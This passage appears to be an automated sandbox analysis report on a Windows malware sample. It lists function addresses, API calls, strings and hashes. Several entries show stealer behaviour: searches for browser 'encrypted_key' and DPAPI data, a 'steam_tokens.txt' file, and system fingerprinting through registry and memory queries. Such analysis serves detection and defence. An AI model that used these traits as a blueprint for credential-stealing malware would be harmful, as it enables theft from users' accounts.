                          Function 00422910 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00422925
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0042292C
                          • RegOpenKeyExA.ADVAPI32(80000002,00FABCB0,00000000,00020119,004228A9), ref: 0042294B
                          • RegQueryValueExA.ADVAPI32(004228A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00422965
                          • RegCloseKey.ADVAPI32(004228A9), ref: 0042296F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: 5364e14c0a3d05156664c7df2c62bb00f5e878ba2183d47dff6cc4ea0b38e43d
                          • Instruction ID: c5fe118d464dd8edc36b27dd1f265e731215acc2a0e12dade4fb376ba34b0d4d
                          • Opcode Fuzzy Hash: 5364e14c0a3d05156664c7df2c62bb00f5e878ba2183d47dff6cc4ea0b38e43d
                          • Instruction Fuzzy Hash: 1501B175600329BFD314CBA0AC59EFB7BBDEB48755F100059FE4597240EAB159448BE0
                          Function 00422880 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00422895
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0042289C
                            • Part of subcall function 00422910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00422925
                            • Part of subcall function 00422910: RtlAllocateHeap.NTDLL(00000000), ref: 0042292C
                            • Part of subcall function 00422910: RegOpenKeyExA.ADVAPI32(80000002,00FABCB0,00000000,00020119,004228A9), ref: 0042294B
                            • Part of subcall function 00422910: RegQueryValueExA.ADVAPI32(004228A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00422965
                            • Part of subcall function 00422910: RegCloseKey.ADVAPI32(004228A9), ref: 0042296F
                          • RegOpenKeyExA.ADVAPI32(80000002,00FABCB0,00000000,00020119,00419500), ref: 004228D1
                          • RegQueryValueExA.ADVAPI32(00419500,00FBDE28,00000000,00000000,00000000,000000FF), ref: 004228EC
                          • RegCloseKey.ADVAPI32(00419500), ref: 004228F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: 6afc374b1021e13fac2369d4108616fa2db62d40761026aa18e21b5f00d63e66
                          • Instruction ID: b838523736346adb7ce8e3c82dd77743de362bd687d96efd208b95ca381da15e
                          • Opcode Fuzzy Hash: 6afc374b1021e13fac2369d4108616fa2db62d40761026aa18e21b5f00d63e66
                          • Instruction Fuzzy Hash: B301A271B00318BFD714ABA4AD49FEA777EEB44315F000159FE09D3250DAB499448BE0
                          Function 004071F0 Relevance: 9.1, APIs: 6, Instructions: 142memorylibraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(?), ref: 0040723E
                          • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00407279
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00407280
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 004072C3
                          • HeapFree.KERNEL32(00000000), ref: 004072CA
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00407329
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                          • String ID:
                          • API String ID: 174687898-0
                          • Opcode ID: ed1be72cb97006b6cfa7eec419b7bbe96971c02547229239504ae9556a509935
                          • Instruction ID: 27169f5df709d88f62061863ce62bc47ac52a8987bb1457c2f2a5aa34c0093c8
                          • Opcode Fuzzy Hash: ed1be72cb97006b6cfa7eec419b7bbe96971c02547229239504ae9556a509935
                          • Instruction Fuzzy Hash: 4E416B71B046059BEB20CF69DC84BAAB3E9BB84305F1445BAEC49D7380E635F900DA65
                          Function 00409C70 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 124memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 00409CA8
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00409CDA
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D03
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocLocallstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2746078483-738592651
                          • Opcode ID: 8fd2bcfc67d25209425241227c813c0e4ef18065d64adf87ac0d9fb9c51ec3f9
                          • Instruction ID: ad9cec8cc1c90d85c3ad67c9ce925e1efb107697941990958aebc0490f667acb
                          • Opcode Fuzzy Hash: 8fd2bcfc67d25209425241227c813c0e4ef18065d64adf87ac0d9fb9c51ec3f9
                          • Instruction Fuzzy Hash: 2A419D31B0020A9BDB21EF69D9456AF77B4AF54308F04447AED15B73E3DA78AD04CB98
                          Function 0041E9E0 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                          Download Yara Rule
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0041EA24
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041EA53
                          • lstrcat.KERNEL32(?,00000000), ref: 0041EA61
                          • lstrcat.KERNEL32(?,00431794), ref: 0041EA7A
                          • lstrcat.KERNEL32(?,00FB8AE0), ref: 0041EA8D
                          • lstrcat.KERNEL32(?,00431794), ref: 0041EA9F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: 24efa4d62bf1b18e58e6653d9f447b2f22108c514c91e68fd26aaca9e1d00bc0
                          • Instruction ID: 7c7973f30af5ec6e024af78e735b51de974a09fd347e59ab0f9f73f2c21397d0
                          • Opcode Fuzzy Hash: 24efa4d62bf1b18e58e6653d9f447b2f22108c514c91e68fd26aaca9e1d00bc0
                          • Instruction Fuzzy Hash: EC418571B10118ABCB15EB64DD45EED7379BF48300F0054ADBA16A72D0DFB49E848FA4
                          Function 0041ECB0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0041ECDF
                          • lstrlen.KERNEL32(00000000), ref: 0041ECF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041ED1D
                          • lstrlen.KERNEL32(00000000), ref: 0041ED24
                          • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 0041ED52
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: steam_tokens.txt
                          • API String ID: 367037083-401951677
                          • Opcode ID: 1aa12a3fc33ac51e83087fb66b9ed763023bd6fc2a8d315f7fe8c24c01f0fb3d
                          • Instruction ID: 5e4229333b3134b13e4a8b7bae4d7063a41ac74a7d65ada3b7cea2f777646fb4
                          • Opcode Fuzzy Hash: 1aa12a3fc33ac51e83087fb66b9ed763023bd6fc2a8d315f7fe8c24c01f0fb3d
                          • Instruction Fuzzy Hash: 63318D31B105155BC722BB7AEE4A99F77A5AF40304F04103AB805EB2D2DE7CDC498BD9
                          Function 00409A80 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,0040140E), ref: 00409A9A
                          • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0040140E), ref: 00409AB0
                          • LocalAlloc.KERNEL32(00000040,?,?,?,?,0040140E), ref: 00409AC7
                          • ReadFile.KERNEL32(00000000,00000000,?,0040140E,00000000,?,?,?,0040140E), ref: 00409AE0
                          • LocalFree.KERNEL32(?,?,?,?,0040140E), ref: 00409B00
                          • CloseHandle.KERNEL32(00000000,?,?,?,0040140E), ref: 00409B07
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: 18fe08c416d9db512f6576e54d93a0197b66446ba9587125c2374a8c0eafa297
                          • Instruction ID: e07bc1cf37077e01f74a08ddf4965744106ae1532c602a75826c3d4cb70f4bb0
                          • Opcode Fuzzy Hash: 18fe08c416d9db512f6576e54d93a0197b66446ba9587125c2374a8c0eafa297
                          • Instruction Fuzzy Hash: 97115E71600209AFE710DFA9DDC8AAB737DFB44350F10016AF901A72C1EB74AD50CBA4
                          Function 00425AD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                          Download Yara Rule
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00425B14
                            • Part of subcall function 0042A173: std::exception::exception.LIBCMT ref: 0042A188
                            • Part of subcall function 0042A173: std::exception::exception.LIBCMT ref: 0042A1AE
                          • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00425B7C
                          • memmove.MSVCRT(00000000,?,?), ref: 00425B89
                          • memmove.MSVCRT(00000000,?,?), ref: 00425B98
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long
                          • API String ID: 2052693487-3788999226
                          • Opcode ID: 34222853b1227f2056b2f582caa2accab358a8afa38bc1f76db0d2b8d6ab2633
                          • Instruction ID: 97a36a66eccf3a265aeb651c217b2c8c0e856f970e525689608aac58b2709a3b
                          • Opcode Fuzzy Hash: 34222853b1227f2056b2f582caa2accab358a8afa38bc1f76db0d2b8d6ab2633
                          • Instruction Fuzzy Hash: 3E418271B005199FCF18DF6CD991AAEBBB5EB88310F14822AE905E7344E634ED00CB94
                          Function 00417D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                          Download Yara Rule
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00417D58
                            • Part of subcall function 0042A1C0: std::exception::exception.LIBCMT ref: 0042A1D5
                            • Part of subcall function 0042A1C0: std::exception::exception.LIBCMT ref: 0042A1FB
                          • std::_Xinvalid_argument.LIBCPMT ref: 00417D76
                          • std::_Xinvalid_argument.LIBCPMT ref: 00417D91
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_$std::exception::exception
                          • String ID: invalid string position$string too long
                          • API String ID: 3310641104-4289949731
                          • Opcode ID: 57a01d2137173045cca62e33490d6a9c41bca20fe5812ee791e1896c1f9a44ca
                          • Instruction ID: 77123055882c8daa5c63bbea810ac3c2970f1bc3c4d1b7b5e79e5cd4f3fc3ccb
                          • Opcode Fuzzy Hash: 57a01d2137173045cca62e33490d6a9c41bca20fe5812ee791e1896c1f9a44ca
                          • Instruction Fuzzy Hash: F321B6313043044BD720DE6CE881ABAF7F5AF96764F204A6FE4528B381D775DC908769
                          Function 004233C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004233EF
                          • RtlAllocateHeap.NTDLL(00000000), ref: 004233F6
                          • GlobalMemoryStatusEx.KERNEL32 ref: 00423411
                          • wsprintfA.USER32 ref: 00423437
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
